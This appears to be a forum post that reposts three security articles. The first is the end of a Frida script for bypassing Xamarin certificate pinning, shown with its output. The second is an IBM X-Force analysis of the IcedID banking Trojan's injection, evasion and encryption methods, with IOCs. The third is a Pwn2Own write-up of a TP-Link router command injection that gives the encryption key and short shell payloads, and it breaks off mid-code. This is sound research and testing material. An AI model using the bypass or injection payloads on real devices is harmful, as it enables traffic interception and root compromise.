let http = MonoApi.mono_assembly_load_with_partial_name(Memory.allocUtf8String('System.Net.Http'), status);
let img = MonoApi.mono_assembly_get_image(http);
let hooked = false;

let kHandler = MonoApi.mono_class_from_name(img, Memory.allocUtf8String('System.Net.Http'), Memory.allocUtf8String('HttpClientHandler'));
if (kHandler) {
    let ctor = MonoApiHelper.ClassGetMethodFromName(kHandler, 'CreateDefaultHandler');
    // Static method -> instance = NULL.
    let pClientHandler = MonoApiHelper.RuntimeInvoke(ctor, NULL);
    console.log(`[+] Created Default HttpClientHandler @ ${pClientHandler}`);

    // Hook HttpMessageInvoker.SendAsync
    let kInvoker = MonoApi.mono_class_from_name(img, Memory.allocUtf8String('System.Net.Http'), Memory.allocUtf8String('HttpMessageInvoker'));
    MonoApiHelper.Intercept(kInvoker, 'SendAsync', {
        onEnter: (args) => {
            console.log(`[*] HttpClientHandler.SendAsync called`);
            let self = args[0];
            let handler = MonoApiHelper.ClassGetFieldFromName(kInvoker, '_handler');
            let cur = MonoApiHelper.FieldGetValueObject(handler, self);
            if (cur.equals(pClientHandler)) return; // Already bypassed.
            MonoApi.mono_field_set_value(self, handler, pClientHandler);
            console.log(`[+] Replaced with default handler @ ${pClientHandler}`);
        }
    });
    console.log('[+] Hooked HttpMessageInvoker.SendAsync');
    hooked = true;
} else {
    console.log('[-] HttpClientHandler not found');
}

Running the script gives the following output:

$ frida -U com.test.sample -l dist/xamarin-unpin.js --no-pause
     ____
    / _  |   Frida 12.8.7 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://www.frida.re/docs/home/

Attaching...
[+] Created Default HttpClientHandler @ 0xa0120fc8
[+] Hooked HttpMessageInvoker.SendAsync with DefaultHttpClientHandler technique
[-] ServicePointManager validation callback not found.
[+] Done! Make sure you have a valid MITM CA installed on the device and have fun.
[*] HttpClientHandler.SendAsync called
[+] Replaced with default handler @ 0xa0120fc8

As seen above, the SendAsync hook worked as expected and the HttpClientHandler was replaced by a default handler. Subsequent SendAsync calls will check the handler object and avoid replacing it if it has already been hijacked. The screen capture below shows the sample application making a request before and after running the bypass script. The first request gives an SSL exception (as expected) because of the installed callback that always returns false. The second request triggers the hook, which replaces the client handler and returns execution to the HTTP client, hijacking the validation process generically for any HttpClient instance without having to scan memory to find them.

Conclusion

Xamarin and Mono are quickly evolving projects. This technique appears to work very well with the current (Mono 6.0+) framework versions but might require some modifications to work with older or future versions. We hope that sharing the method used to understand and tackle the problem will be useful to the security community in developing similar methods when performing mobile testing engagements. The complete repository containing the code and pre-built Frida scripts can be found on GitHub.

Future Work

The Frida script has been tested on our sample application with regular build options, without ahead-of-time compilation and with the .NET Core method (HttpClientHandler), and works reliably.
There are, however, many scenarios that can occur with Xamarin, and we were not able to test all of them. More specifically, the following have not been tested and could be an area of future development:

- .NET Framework applications which use ServicePointManager
- iOS applications with Full AOT
- Android applications with Partial AOT
- Android applications with Full AOT

If you try the script and run into issues, please open a bug on our issue tracker so we can improve it. Even better, if you end up fixing some issues, we'd be happy to merge your pull requests. And lastly, if you have APKs for one of the untested scenarios and feel like sharing them with us, it will help us ensure that the script works in more cases.

References

Mono Runtime Documentation: https://www.mono-project.com/docs/advanced/runtime/docs/
Mono Compilation Modes: https://www.mono-project.com/docs/advanced/aot/
Mono on GitHub: https://github.com/mono/mono
ServicePointManager deprecation: https://github.com/xamarin/xamarin-android/issues/3682#issuecomment-535679023
Mono Tiered Compilation: https://github.com/mono/mono/issues/16018
Code Release: https://github.com/GoSecure/frida-xamarin-unpin
Fridax – A Xamarin hacking framework: https://github.com/NorthwaveNL/fridax

Sursa: https://www.gosecure.net/blog/2020/04/06/bypassing-xamarin-certificate-pinning-on-android/
  16. Breaking the Ice: A Deep Dive Into the IcedID Banking Trojan's New Major Version Release

April 1, 2020 | By Nir Somech, co-authored by Limor Kessem | 14 min read

The IcedID banking Trojan was discovered by IBM X-Force researchers in 2017. At that time, it targeted banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, mainly in the U.S. IcedID has since continued to evolve, and while one of its more recent versions became active in late 2019, X-Force researchers have identified a new major version release that emerged in 2020 with some substantial changes. This post will delve into the technical details of IcedID version 12 (0xC in hexadecimal).

Before we delve into the technical details, here are the components that saw changes applied in this new version:

- New anti-debugging and anti-VM checks
- Modified infection routine and file location on disk
- Hiding the encrypted payload in a .png file (steganography)
- Modified code injection tactics
- Modified cryptographic functions

In this post, you will also find information on IcedID's naming algorithms, which are used for creating names for its various files, events, and resources. We also mention how to find and extract the malware's internal version number.

IcedID's Entry Point – Targeted Maldocs via Other Malware

IcedID is spread via malspam emails typically containing Office file attachments. The files are booby-trapped with malicious macros that launch the infection routine, then fetch and run the payload. In February 2020 campaigns, maldocs spread in spam first dropped the OStap malware, which then dropped IcedID. OStap was also a vehicle for TrickBot infections in recent months. IcedID has a connection to the Emotet gang, having been dropped by Emotet in the past.

Attack Turf

IcedID's targeting has been consistent since it emerged. Its focus remains on the North American financial sector, e-commerce, and social media.
IcedID targets business users and business banking services.

IcedID's Loader's Behavior

Upon first running the loader in our labs, we observed that it performs a few actions before deciding whether or not to infect the machine. It begins by loading encrypted code from the resource section, decrypts it and executes it.

Figure 1: IcedID loader running encrypted code

As part of the code being executed, the loader uses some newly added anti-VM and anti-debugging techniques in order to check if it is being run in a VM or a sandbox. The output of these checks, alongside other parameters, is then sent to the attacker's command and control (C&C/C2) server to determine whether the victim's machine should be infected. If the malware is to proceed to infect the machine, the C2 server sends back the necessary files to execute, like the malware's configuration file, the actual malicious payload (saved as an encrypted and packed .png file[1]) and a few other accompanying files. The loader then copies itself into two locations:

C:\ImgContent\

[1] Hiding code inside an image is a technique known as steganography.

Figure 2: IcedID loader copies itself to local disk

%appdata%\local\[user]\[generated_name]\

Figure 3: IcedID loader copies itself to a second location on the local disk

Next, in order to maintain persistence on the victim's machine, the malware creates a task in the task scheduler triggering a run of the loader at logon and every hour.

Figure 4: IcedID task scheduler
Figure 5: IcedID task scheduler

After copying itself to these two locations and creating the persistence mechanism, it executes a couple of anti-VM and anti-debugging checks to allow the C2 to 'approve' proceeding to infect the machine, and the loader downloads all the files necessary to execute. In the next section, we will go over the anti-VM and anti-debugging checks the loader performs.
One of the important files the loader fetches is the malicious payload that contains all of IcedID's logic and is actually the main module of the malware. It saves this core module under the path "%appdata%\local\user_name\photo.png". This file is initially encrypted and packed. The path and the file name of the downloaded payload are both hardcoded.

Figure 6: IcedID is saved as a packed, encrypted image

The loader reads the downloaded payload, which is saved as an encrypted .png file, then decrypts it, and will later inject it into a newly created svchost process.

Figure 7: Loader reads IcedID payload

Next, the loader creates a new process, svchost, and injects the decrypted IcedID payload into it.

Figure 8: Process injection into a svchost process

IcedID's Injected Payload

IcedID's actual payload starts executing once it is injected into a newly created svchost process. Since the injected IcedID payload is originally packed, it begins by unpacking itself. After unpacking, the core IcedID module performs some initialization steps in order to run properly. It downloads and reads different files necessary for the execution flow, like the configuration file (chercrgnaa.dat in this case), the certificate file (3D8C2D77.tmp in this case), and other supporting resources.

Figure 9: IcedID payload launched into action

The IcedID module checks to make sure there is no other instance of that same file and that it is not already running[1], gets some information about the victim's system, checks the versioning, sends some information to the C2 and starts scanning for running browser processes in order to inject its payload into them and hook them. The browser hooking will allow IcedID to detect targeted URLs and deploy web injections accordingly.
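The decryption of the photo.png payload uses what the article later describes as a customized RC4 variant keyed with the string 'zeus'. As a baseline for readers who want to experiment, the following is a standard, unmodified RC4 implementation in Python. It is a generic sketch, not IcedID's customized cipher, so it will not decrypt real samples as-is:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key-scheduling (KSA) followed by the PRGA keystream.

    IcedID uses a modified variant of this algorithm, so this generic
    version is only a starting point for building a custom decryptor.
    """
    # Key-scheduling algorithm (KSA).
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # Pseudo-random generation algorithm (PRGA), XORed over the data.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# RC4 is symmetric: encrypting twice with the same key round-trips.
ciphertext = rc4(b"Key", b"Plaintext")
print(ciphertext.hex())  # bbf316e8d940af0ad3 (a well-known RC4 test vector)
assert rc4(b"Key", ciphertext) == b"Plaintext"
```

Because the stream cipher simply XORs a keystream over the data, the same function serves for both encryption and decryption; a working IcedID decryptor would keep this structure and patch in the modified scheduling described later.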
Infection process via loader and IcedID payload:

1. The loader communicates with the C2 to fetch the IcedID payload
2. The loader downloads the malicious payload – a file named photo.png*
3. The loader runs photo.png
4. The loader creates a new instance of svchost.exe
5. The loader injects the malicious payload into the new svchost.exe process

* The second step in the list above happens only the first time the malware is run, or when it updates and downloads a newer version of the malicious payload, photo.png. That is because after downloading the photo.png file, the malware saves it to disk, so that every subsequent launch simply has to load the file from the disk into memory.

[1] See the naming algorithms section – svchost mutex name – for more information.

Figure 10: Infection process via loader and IcedID payload

Anti-VM and Anti-Debugging Tactics

IcedID's new version has been upgraded with additional abilities to hide itself and detect when it is being run in a virtual environment or in debug mode. Previous versions of this malware did not feature these evasion techniques.

The checks start with the loader, which is programmed to identify whether it is running in a virtualized environment or under a debugger. In the images below, we can see the function named "anti_vm" that checks whether the malware is running in an emulator. The loader also uses anti-debugging and anti-VM instructions such as Read Time-Stamp Counter (RDTSC), which can help it detect whether a researcher is pausing execution in a debugger at different steps. It further uses CPUID with 0x40000000 as a parameter to look for hypervisor brands, among other checks.

We can see in the image below that the loader runs a loop 255 times. Inside the loop, it executes the RDTSC instruction at both the beginning and the end of the loop, and in between it executes the CPUID instruction with 0x01 as a parameter.
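Both loader checks, the RDTSC timing loop and the CPUID hypervisor-brand probe, are easy to prototype outside the malware. The Python sketch below is a hypothetical reimplementation for illustration only (RDTSC and CPUID are x86 instructions, so the sketch operates on values already collected from them; the bucket thresholds and counter grouping mirror the disassembly described here, and the function names are our own):

```python
def bucket_timing_deltas(deltas):
    """Classify RDTSC deltas the way the loader does.

    On bare metal, a CPUID round-trip costs at most a few hundred cycles;
    a debugger single-step or VM exit produces large outliers, shifting
    counts into the higher buckets.
    """
    counters = {"lt_250": 0, "lt_500": 0, "lt_750": 0, "lt_1000": 0, "big_gap": 0}
    for d in deltas:
        if 0 < d < 250:
            counters["lt_250"] += 1
        elif d < 500:
            counters["lt_500"] += 1
        elif d < 750:
            counters["lt_750"] += 1
        elif d < 1000:
            counters["lt_1000"] += 1
        else:
            counters["big_gap"] += 1
    return counters


def decode_hypervisor_brand(ebx, ecx, edx):
    """Decode the CPUID leaf 0x40000000 vendor signature.

    Each 32-bit register holds four little-endian ASCII bytes; concatenated,
    they spell the hypervisor brand string.
    """
    raw = b"".join(r.to_bytes(4, "little") for r in (ebx, ecx, edx))
    return raw.rstrip(b"\x00").decode("ascii")

# The VMware register values from the disassembly decode to a readable brand.
print(decode_hypervisor_brand(0x61774D56, 0x4D566572, 0x65726177))  # VMwareVMware
```

Feeding the decoder the Xen, Hyper-V or KVM constants listed below yields "XenVMMXenVMM", "Microsoft Hv" and "KVMKVMKVM" respectively, which is how the loader (and the C2 receiving the results) can recognize the virtualization vendor.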
Figure 11: Using the RDTSC instruction to detect running under debug mode

Usually, the output of the CPUID instruction with 0x01 as a parameter is used to detect VMs, but here the loader ignores the output and only calculates the time difference between the first and the second calls of RDTSC. Depending on the calculated delta, the loader increments the relevant counter:

0 < difference < 250 -> ++less_250_miliseconds
250 < difference < 500 -> ++less_500_miliseconds
500 < difference < 750 -> ++less_750_miliseconds
750 < difference < 1000 -> ++less_1000_miliseconds
else -> ++Big_Gap

Next, the malware performs yet another test in order to determine whether it is running in a VM or on a physical machine:

Figure 12: Malware checking if it is being run in a test environment

It calls CPUID with 0x40000000 as a parameter, and the output is a value that indicates the VM vendor brand and type when it is run inside a virtual machine:

VMM_XEN: ebx = 0x566e6558, ecx = 0x65584d4d, edx = 0x4d4d566e
VMM_HYPER_V: ebx = 0x7263694D, ecx = 0x666F736F, edx = 0x76482074
VMM_VMWARE: ebx = 0x61774d56, ecx = 0x4d566572, edx = 0x65726177
VMM_KVM: ebx = 0x4b4d564b, ecx = 0x564b4d56, edx = 0x0000004d

All this collected data is later sent to the C2 server to help determine whether the malware is being run in a VM or a debugged environment. Based on the output, the C2 server decides whether to send all the files necessary to infect the machine and run the IcedID core module.

Code Injection Techniques

IcedID has two code injection methods. The first injection method is used when the malware is launched for the first time or at system start-up; it injects code into a spawned svchost.exe process. The second injection method takes place when the malware detects that a browser process is running in the background; it injects its shellcode into that running browser process. IcedID also uses slight code obfuscation to make it difficult to analyze.
The code obfuscation works by calling Windows API functions indirectly: instead of calling a function directly, the malware dynamically resolves the Windows API functions it needs, loads their addresses into registers, and calls through the registers. Let's look at these two injection techniques more closely.

IcedID's Svchost Process Injection Method

In the first code injection type, the malware begins by creating a svchost process in a suspended state.

Figure 13: IcedID code injection process
Figure 14: IcedID code injection process

Next, it allocates memory in the target process (svchost.exe) and injects its shellcode into the allocated memory. It then changes the protection flag of the allocated memory space to PAGE_READ_EXECUTE. Next, it calls the function "NtQueueApcThread" with the main thread of the injected process and the entry point address in the injected shellcode. At the end of the injection process, it calls "NtResumeThread" in order to run its own code in the now-injected process (svchost.exe).

Figure 15: IcedID code injection process
Figure 16: IcedID code injection process
Figure 17: IcedID code injection process
Figure 18: IcedID code injection process

Svchost –> Browser Injection Method

This second case takes place when the malicious svchost process detects that a browser process was launched. It gets a handle to the process and calls the function "Inject_browser", as shown in the figure below.

Figure 19: IcedID browser injection process

Inside "Inject_browser", it calls three functions — "ZwWritevirtualMemory", "NtProtectVirtualMemory" and "ZwAllocatevirtualMemory" — in order to inject its shellcode into the browser's process. After injecting the shellcode into the browser process, it calls "CreateRemoteThread" with the entry point address in the injected shellcode.
Figure 20: IcedID browser injection process
Figure 21: IcedID browser injection process
Figure 22: IcedID browser injection process

IcedID's Cryptographic Choices and Techniques

IcedID uses a few different decryption and decoding algorithms to hide artefacts that could help malware researchers understand the context of its functions and operational flow. The cryptographic functions are used in all processes that IcedID creates or injects into, namely svchost and web browser processes. IcedID's cryptography functions are as follows:

1. Decode (int a1)

Usually used with other decryption algorithms — for example, the algorithms that decode the browser event name or the mutex in the svchost process. The function gets one argument, an integer, and runs a few bitwise operations on this parameter.

Figure 23: IcedID decoding function Decode (int a1)

2. Decrypt (int key, string encrypted_string)

Usually used to decrypt encrypted strings and artefacts in the code, which are encrypted in order to hinder reverse engineering. The function gets two arguments: a key (integer) and the string to decrypt (string). This function remains unchanged from the last version of IcedID.

Figure 24: IcedID decryption function

3. Decode_by_constant (int key, char[] arr)

Responsible for generating event names for browser processes that IcedID manages to infect. The function gets two arguments: a constant/key (integer) and an array (char[]).

Figure 25: IcedID Decode_by_constant function

4. CreateGlobalKey (string sid)

Creates a global key that is then used for other encryption and decryption algorithms and for naming algorithms. This function gets one argument: the SID of the infected user's device. The algorithm used here is the Fowler–Noll–Vo hash.

Figure 26: IcedID using the Fowler–Noll–Vo non-cryptographic hash function

5.
RC4_variant (int[] arr)

This function is responsible for decrypting encrypted files, such as configuration files, the encrypted payload downloaded from the C2, the code loaded and injected into the svchost process, and more. This encryption/decryption algorithm is an RC4 cipher variant that continues to use the string 'zeus' as the keyword, as it did in previous versions. There were slight changes to the RC4 cipher in this version, which means that standard RC4 decryption routines from Python libraries will not work against the RC4-encrypted data, because the cipher has been customized by IcedID's developers. A custom or modified RC4 decryptor has to be used to decrypt new configurations. The function gets one argument – an array – that contains the encrypted payload to decrypt.

Figure 27: IcedID using the RC4 stream cipher to encrypt/decrypt resources

6. initKey (int GlobalKey, int constant, int[] key)

Initializes the key for the RC4 variant decryption algorithm. It gets three parameters: the GlobalKey (integer), a constant (integer) and an array of integers/chars.

Figure 28: IcedID initKey function

IcedID's Naming Algorithms

IcedID uses a few naming algorithms to generate names for its files, directories, mutexes, events, etc. Here are some of the different uses of IcedID's naming algorithms:

1. Browser Event Name

When the malware injects itself into a new browser process, it creates an event in order to know that this browser process has already been injected. It uses the function "decode_by_constant(int key, char[] arr)" to generate the event name. The event name is similar for all types of browsers. For the event name created in the browser, the key is hardcoded with the value 6 (key = 6).

Figure 29: IcedID uses a naming algorithm to generate names for events

2. Svchost Mutex Name

When the malware is injected into a svchost process that it created, it also creates a mutex in order to know that this svchost process has already been injected.
In the image below, we can see the "create_mutex_svchost" function. At the beginning of the function, it calls the function "generate_mutex_name" to generate the name of the mutex that will be created. The function has two parameters: key, which is the hardcoded value 7, and array, which will contain the generated name.

Figure 30: IcedID uses a naming algorithm to name mutexes it creates

The function "generate_mutex_name" first calls the function "mutex_name" with key=7 and an empty array that will contain the characters used for the mutex name. Next, it calls the function "decrypt" with the encrypted "mutex_name_format" string. Finally, it prints and returns the mutex name into the array it got as an argument.

Figure 31: IcedID mutex naming technique

The function "mutex_name" gets as arguments a key (key=7) and an array that will contain the resulting mutex name. It runs a few bitwise operations on the argument key and the globalkey/init_key. The result of these bitwise operations is the svchost mutex name.

Figure 32: IcedID mutex naming technique

3. Configuration File Paths

First, the malware retrieves the "appdata\local\" path by calling the function SHGetFolderPathW with 0x1c as a parameter, as pictured below in Figure 33 (circled in black). Next, it calls the function Decode_by_constant(key, arr) with key=4. The return value is the name of the folder in "appdata\local\", as pictured below in Figure 33 (circled in gray).

There are two configuration files in the configuration folder, both with .dat extensions. In order to generate the file names, IcedID performs the following steps: each of the files has an initial constant value (0 and 1); the malware runs some bitwise operations on them and gets an integer as a result (5 and 261), as pictured below in Figure 33 (circled in red). Next, it takes the generated value and calls the function Decode_by_constant(key, arr) with key=generated_value.
The returned value makes up all but the last two characters of the configuration file's name, as pictured below in Figure 33 (circled in red). The last two characters of the configuration file's name are generated by executing bitwise operations on the initial value related to the file, as pictured below in Figure 33 (circled in yellow).

Figure 33: IcedID configuration files path definition
Figure 34: IcedID configuration files

IcedID's Certificate Files

The IcedID version we examined stores certificate files related to the malware under "appdata\local\Temp", with the same name as the global key the malware generates. The suffix of the certificate file is .tmp.

Figure 35: IcedID certificate files stored as .tmp files

IcedID's Configuration Files

IcedID downloads configuration files from the C&C. The configuration files contain the targeted banks and retailers, as well as the payload injected into the browser processes.

Figure 36: IcedID configuration files

IcedID's Code Versioning

IcedID's developers continuously update its code over time. While bug fixes are naturally more frequent, we also see the occasional release of a new major version. This malware's version number is hardcoded and resides in the encrypted photo.png file. We can see the version number in the malicious svchost process by looking at the function that contains the main logic of the malware.

Figure 37: IcedID version number is a part of its code

Circled in red in Figure 37 above, we can see the sample version: 12 (0xC in hexadecimal).

Browser Hooking

When IcedID detects a browser process running in the system, it injects its malicious payload into the browser process and hooks relevant functions. Some of the targeted functions are Windows API functions, such as those from the kernel32, crypt32, WinINet and ws2_32 dynamic link libraries, and some are related to the browser vendor.

Figure 38: Browser hooked functions

IcedID Still in the Cybercrime Game

IcedID emerged in 2017 and continues to evolve its capabilities.
While it has not been the most active malware over the past three years, its low activity volumes are mostly attributed to its continued focus on the same attack turf: North America. And while it has not topped the charts of 2019's most prevalent banking Trojans, it has consistently been targeting banks and retailers, and it receives updates to the mechanisms that allow it to keep working on devices that get updated over time.

Figure 39: Top banking Trojans in 2019 (Source: IBM X-Force)

With its known connections to elite cybercrime gangs originating in Russia and other parts of Eastern Europe, the IcedID Trojan, and the group that operates it, are likely to remain part of the cybercrime arena. Interestingly, while we have been observing different gangs in this sphere diversify their revenue models to include high-stakes ransomware attacks, IcedID has not been part of the same trend so far. Will it follow in the footsteps of its counterparts? We will be following the trend as it evolves.

To stay up to date on IcedID and other malware and receive technical updates on the threat landscape, read IBM X-Force research blogs on Security Intelligence and visit X-Force Exchange.

IOCs

MD5s:
Loader: 9C8EF9CCE8C2B7EDA0F8B1CCDBE84A14
Payload: 925689582023518E6AA8948C3F5E7FFE

Connections:
hxxp://www.hiperdom[.]top
hxxp://www.gertuko[.]top

File Paths:
C:\Users\[user]\AppData\Local\"generated name"
C:\Users\[user]\AppData\Local\"user name"
C:\Users\[user]\AppData\Local\Temp

Sursa: https://securityintelligence.com/posts/breaking-the-ice-a-deep-dive-into-the-icedid-banking-trojans-new-major-version-release/
  17. Exploiting the TP-Link Archer A7 at Pwn2Own Tokyo

April 07, 2020 | Guest Blogger

During the Pwn2Own Tokyo competition last fall, Pedro Ribeiro (@pedrib1337) and Radek Domanski (@RabbitPro) used a command injection vulnerability as part of the exploit chain they used to gain code execution on a TP-Link Archer A7 wireless router, which earned them $5,000. The bug used in this exploit was recently patched, and Pedro and Radek have graciously put together this blog post describing the command injection vulnerability.

This article describes a command injection vulnerability that we found and presented at the Pwn2Own Tokyo competition in November 2019. The vulnerability exists in the tdpServer daemon (/usr/bin/tdpServer), running on the TP-Link Archer A7 (AC1750) router, hardware version 5, MIPS architecture, firmware version 190726.

This vulnerability can only be exploited by an attacker on the LAN side of the router, but authentication is not necessary. After exploitation, an attacker is able to execute any command as root, including downloading and executing a binary from another host. This vulnerability was assigned CVE-2020-10882 and was addressed by TP-Link with firmware version A7(US)_V5_200220.

All function offsets and code snippets in this article are taken from /usr/bin/tdpServer, firmware version 190726.

Background on tdpServer

The tdpServer daemon listens on UDP port 20002 on interface 0.0.0.0. The overall functionality of the daemon is not fully understood by the authors at this point, as this was unnecessary for exploitation. However, the daemon seems to be a bridge between the TP-Link mobile application and the router, allowing establishment of some sort of control channel from the mobile application. The daemon communicates with the mobile application through the use of UDP packets with an encrypted payload.
We reversed the packet format, and it is shown below:

Figure 1 - Reversed tdpServer packet format

The packet type determines what service in the daemon will be invoked. A type of 1 will cause the daemon to invoke the tdpd service, which will simply reply with a packet containing a certain TETHER_KEY hash value. Because this is not relevant to the vulnerability, we did not investigate it in detail. The other possible type is 0xf0, which invokes the onemesh service. This service is where the vulnerability lies. OneMesh appears to be a proprietary mesh technology that was introduced by TP-Link in recent firmware versions for a number of their routers. The other fields in the packet are relatively well explained in the comments above.

Understanding the Vulnerability

Upon device start-up, the first relevant function invoked is tdpd_pkt_handler_loop() (offset 0x40d164), which opens a UDP socket listening on port 20002. Once a packet is received, this function passes the packet to tpdp_pkt_parser() (0x40cfe0), of which a snippet is shown below:

Figure 2 - tdpd_pkt_parser() #1

In this first snippet, we see that the parser first checks that the packet size as reported by the UDP socket is at least 0x10, which is the size of the header. Then it invokes tdpd_get_pkt_len() (0x40d620), which returns the length of the packet as declared in the packet header (len field). This function returns -1 if the packet length exceeds 0x410.

The final check is done by tdpd_pkt_sanity_checks() (0x40c9d0), which will not be shown for brevity, but it performs two verifications. First, it checks if the packet version (version field, the first byte in the packet) is equal to 1. Next, it calculates a checksum of the packet using a custom checksum function: tpdp_pkt_calc_checksum() (0x4037f0). To better understand what is happening, the following function is calc_checksum(), which is part of the lao_bomb exploit code. It is shown in place of tpdp_pkt_calc_checksum() as it is easier to understand.
Figure 3 - calc_checksum() from the lao_bomb exploit code The checksum calculation is quite straightforward. It starts by setting a magic variable of 0x5a6b7c8d in the packet’s checksum field, and then uses reference_tbl, a table with 1024 bytes, to calculate the checksum over the whole packet, including the header. Once the checksum is verified and all is correct, tdpd_pkt_sanity_checks() returns 0, and we then enter the next part of tdpd_pkt_parser(): Figure 4 - tdpd_pkt_parser() #2 Here the second byte of the packet, the type field, is checked to see if it is 0 (tdpd) or 0xf0 (onemesh). In the latter branch, it also checks if the global variable onemesh_flag is set to 1, which it is by default. This is the branch we want to follow. We then enter onemesh_main() (0x40cd78). onemesh_main() won’t be shown here for brevity, but its job is to invoke another function based on the packet’s opcode field. In order to reach our vulnerable function, the opcode field has to be set to 6, and the flags field has to be set to 1. In this case, onemesh_slave_key_offer() (0x414d14) will be invoked. This is our vulnerable function, and as it is very long, only the relevant parts will be shown. Figure 5 - onemesh_slave_key_offer() #1 In this first snippet of onemesh_slave_key_offer(), we see that it passes the packet payload to tpapp_aes_decrypt() (0x40b190). This function will also not be shown for brevity, but it’s easy to understand what it does from the name and its arguments: it decrypts the packet payload using the AES algorithm and the static key “TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP”. This encryption was complicated to replicate in the lao_bomb exploit. We will explain this in detail in the next section. 
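To make the header handling and checksum flow concrete, here is a rough Python sketch of building a packet that would pass these checks. Only the 0x10-byte header size, the version/type bytes, the 0x410 length limit, and the 0x5a6b7c8d checksum seed come from the analysis above; the offsets of the remaining header fields, and the use of a standard CRC-32 in place of tdpServer's custom 1024-byte reference_tbl, are assumptions for illustration only.

```python
import struct
import zlib

CHECKSUM_SEED = 0x5A6B7C8D  # magic value written into the checksum field before computing

def build_tdp_packet(payload, version=1, pkt_type=0xF0, opcode=6, flags=1):
    """Build a 0x10-byte header plus payload (field layout past version/type is hypothetical)."""
    if len(payload) > 0x410:
        raise ValueError("packet too long: tdpd_get_pkt_len() rejects anything over 0x410")
    # hypothetical layout: version, type, opcode, flags, len (u16), 2 pad bytes, checksum (u32), 4 pad bytes
    header = struct.pack(">BBBBHxxI4x", version, pkt_type, opcode, flags,
                         len(payload), CHECKSUM_SEED)
    packet = bytearray(header + payload)
    # stand-in for the custom table-driven checksum: CRC-32 over the whole packet,
    # computed with the seed value sitting in the checksum field
    struct.pack_into(">I", packet, 8, zlib.crc32(bytes(packet)))
    return bytes(packet)
```

A receiver would repeat the same computation, with the seed back in place, and compare the result against the stored field, mirroring what tdpd_pkt_sanity_checks() does.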
For now, we will assume that tpapp_aes_decrypt was able to decrypt the packet successfully, so we move on to the next relevant snippet in onemesh_slave_key_offer(): Figure 6 - onemesh_slave_key_offer() #2 In this snippet, we see some other functions being called (basically the setup of the onemesh object) followed by the start of the parsing of the actual packet payload. The expected payload is a JSON object, such as the one shown below: Figure 7 - Example JSON payload for onemesh_slave_key_offer() In Figure 6, we can see the code first fetching the method JSON key and its value, and then the start of the parsed data JSON object. The next snippet shows that each key of the data object is processed in order. If one of the required keys does not exist, the function simply exits: Figure 8 - onemesh_slave_key_offer() #3 As can be seen above, the value of each JSON key is parsed and then copied into a stack variable (slaveMac, slaveIp, etc). After parsing the JSON object, the function starts preparing the response by invoking create_csjon_obj() (0x405fe8). From here onwards, the function performs a variety of operations on the received data. The part that matters is shown below: Figure 9 - onemesh_slave_key_offer() #4 And here is our vulnerability in its full glory. Referring back to Figure 8 above, you can see that the value of the JSON key slave_mac was copied into the slaveMac stack variable. In Figure 9, slaveMac is copied by sprintf into the systemCmd variable that is then passed to system(). Exploitation Reaching the Vulnerable Function The first thing to determine is how to reach this command injection. After trial and error, we found out that sending the JSON structure shown in Figure 7 above always hits the vulnerable code path. In particular, method has to be slave_key_offer, and want_to_join has to be false. 
The other values can be chosen arbitrarily, although some special characters in fields other than slave_mac might cause the vulnerable function to exit early and not process our injection. With regards to the packet header, as previously described, we have to set type to 0xf0, opcode to 6 and flags to 1, as well as get the checksum field correct. Encrypting the Packet As explained in the previous section, the packet is encrypted with AES with a fixed key of TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP. There are a few more missing pieces to this puzzle, though. The cipher is used in CBC mode and the IV is the fixed value 1234567890abcdef1234567890abcdef. Furthermore, despite having a 256-bit key and IV, the actual algorithm used is AES-CBC with a 128-bit key, so half of the key and IV are not used. Achieving Code Execution Now that we know how to hit the vulnerable code path, can we just send a packet with a command and get code execution? There are two problems to overcome: i. The strncpy() only copies 0x11 bytes from the slave_mac_info key into the slaveMac variable, and that includes the terminating null byte. ii. We need to perform some escaping, since the value in slaveMac will be enclosed in both single and double quotes. With these two constraints in mind, the actual available space is quite limited. In order to escape the arguments and execute a payload, we have to add the following characters: ';<PAYLOAD>' We have just lost 3 characters, leaving us with only 13 bytes to construct our payload. With 13 bytes (characters), it's pretty much impossible to execute anything meaningful. In addition, we found through testing that the limit is actually 12 bytes. We did not fully understand why, but it appears it has to do with the escaping. Our solution was to trigger the bug many times, building up a desired command file on the target one character at a time. Then we trigger the bug one final time to execute the command file as a shell script. 
Even so, this technique is a lot more difficult than it looks at first glance. Consider, for example, that to append a character ‘a’ to a file named ‘z’, we can simply do this: printf a>>z Notice how even this simple case requires 11 bytes. If we want to write a digit, the technique shown above does not work. This is because a digit is interpreted by the shell as a file descriptor. Similarly, special characters such as ‘.’ or ‘;’ that are interpreted by the shell cannot be written to a file using the method above. To handle these cases, we need to do the following: printf '1'>x If you notice, this actually does not append a character to an existing file but instead creates a new file named ‘x’ (overwriting any existing file by that name) containing just the character ‘1’. Since this payload is already 12 characters long, there is no way to add an extra ‘>’ that would allow us to append the 1 to the command file we are building. Nevertheless, there is a solution. Every time we need to emit a digit or special character, we first write the character to a new file, and afterwards use cat to append the contents of this new file to the command file being built: cat x*>>z* You might wonder why we need the ‘*’ at the end of each file name. That's because despite the fact that we always escape the command we send, the last few bytes of the Lua script that was supposed to be executed end up in the file name. This means that when we try to create a file named ‘z’, in reality it will be named ‘z"})’. Adding the full filename into our command would consume too many bytes. Luckily for us, the shell performs wildcard (glob) expansion on the special ‘*’ character, matching the mangled file name for us. Astute readers will notice that we did not change to /tmp, as is often necessary on embedded devices, since the filesystem root is usually not writeable. Again, we were lucky. The root filesystem is mounted read-write, which is a major security mistake by TP-Link. 
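The byte-budget bookkeeping above can be sketched in Python. This is an illustrative generator only (the real exploit also had to cope with the mangled file names, hence the '*' globs): for letters it uses the direct printf append, and for digits and special characters it stages the character in a scratch file first.

```python
def build_payloads(cmd):
    """Emit <=12-byte shell snippets that write cmd into file 'z' one character at a time."""
    payloads = []
    for ch in cmd:
        if ch.isalpha():
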